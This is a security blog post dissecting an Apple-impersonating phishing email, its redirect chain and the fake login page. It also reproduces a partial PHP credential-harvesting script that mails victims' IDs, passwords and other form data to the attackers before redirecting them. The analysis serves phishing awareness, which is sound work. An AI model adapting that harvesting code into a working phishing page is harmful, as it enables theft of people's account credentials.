I was phished again some days ago. This time I received a well made phishing mail with a request for verifying my Apple account details:
Phishing Mail Browser View
This was a targeted attack because the email was directly sent to my Hotmail account. When viewed on the iPad the email looks like an official email from Apple.
But viewed in Outlook the senders address
Apple . <apple__itunes@outlook.com>
made it clear: This was a phishing attack. Apple would never send such a mail from an outlook.com account.
Fortunately, the attackers provided a copy of the phishing scripts for download from their web service. This offered me the wonderful opportunity to analyze a phishing attempt in detail.
All links in the email point to the same internet address, a server in France, that was compromised by the attackers to cover their tracks. They installed a small script ‘apple.php’ which was used for forwarding to the malicious site. The malicious site is hosted by a provider in Vancouver, Canada.
Phishing Site Login Form
This is a really well crafted site in Apple style. But two errors in the address line
[1] http://[2]app-secure-restore.lideresrd.com/APP/ACCOU/RESET/
immediately catch the eye:
[1] Apple would never use the unsecure http protocol for access to site where users have to input their credentials. Standard for those applications is the https protocol.
In my opinion the protocol is the best indicator for identifying a phishing attempt.
As a rule of thumb, the usage of protocol http for user authentication means: You are under attack!
[2] Apple would never use a web service outside the Apple company web for user data verification.
Since we have identified this site as a malicious site, we enter some rubbish and press Continue for the next page. When pressing Continue the html command
<form method="post" action="RESTORE/">
is executed and sub page RESTORE at
‘http://app-secure-restore.lideresrd.com/APP/ACCOU/RESET/RESTORE/’ is displayed:
Account Verifiacation Details
Page RESTORE is created at runtime by a php script. If you press Verify my Information the script is executed again. This time it emails [1] the data you entered to the attackers and runs script finish.php [2] that forwards you to the Apple store.
<!--?php
$from_name = 'íΤunes';
$from_email = 'localhost';
$to_email = '<Attackers email addresses>';
$subject = 'New UK íΤunes | '.$_POST['A13'].' ';
[2] $url_redirect = 'finish.php';
if(isset($_POST) AND !empty($_POST) AND isset($_POST['A9'])){
require_once("mail.class.php");
$mail = new mail();
$mail->emailto = $to_email;
$mail->namefrom = $from_name;
$mail->emailfrom = $from_email;
$mail->subject = $subject;
$mail->message = '';
$mail->message .= 'CoT : '.$_POST['A5'].'
'; // payys
$mail->message .= 'I : '.$_POST['donnee1'].'
'; //Id
$mail->message .= 'P : '.$_POST['donnee2'].'
'; //Pass
.... more code
$mail->message .= 'DRL : '.$_POST['A13'].'
'; // Sortt
$mail->message .= 'CP : '.$_POST['A14'].'
'; // Carpas
$mail->check = $_POST['is_valid_email'];
[1] $mail->send();
header('location:'.$url_redirect);
}
else{
?>
That was a really long journey from Germany via France and Canada to Cupertino.
Take care!
IT Security Matters 